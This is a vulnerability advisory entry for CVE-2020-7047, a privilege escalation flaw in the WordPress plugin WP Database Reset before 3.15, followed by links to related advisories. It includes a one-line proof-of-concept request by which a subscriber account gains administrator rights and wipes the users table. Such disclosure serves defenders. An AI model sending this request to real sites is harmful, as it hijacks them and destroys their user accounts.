Lucene search
Chloe ChamberlandWPEX-ID:0B76DC5B-A0A9-4C92-9FD8-652245549913HistoryJan 16, 2020 - 12:00 a.m.
WP Database Reset < 3.15 - Privilege Escalation
2020-01-1600:00:00
Chloe Chamberland
8
0.004 Low
EPSS
Percentile
74.9%
This flaw “allowed any authenticated user, even those with minimal permissions, the ability to grant their account administrative privileges while dropping all other users from the table with a simple request.”
Login as a subscriber then send the following request:
URL/wp-admin/admin.php?db-reset-tables%5B%5D=users&db-reset-code=11111&db-reset-code-confirm=11111Related
nvd
nvd
CVE-2020-7047
2020-01-16 21:15:12
cve
cve
CVE-2020-7047
2020-01-16 21:15:12
cvelist
cvelist
CVE-2020-7047
2020-01-16 20:37:04
prion
prion
Design/Logic Flaw
2020-01-16 21:15:00
wpvulndb
wpvulndb
WP Database Reset < 3.15 - Privilege Escalation
2020-01-16 00:00:00
patchstack
patchstack
checkpoint_advisories
checkpoint_advisories
openvas
openvas
WordPress Database Reset Plugin <= 3.1 Multiple Vulnerabilities
2020-01-24 00:00:00
qualysblog
qualysblog
WordPress Database Reset Plugin Vulnerability (CVE-2020-7047, CVE-2020-7048)
2020-01-24 16:00:16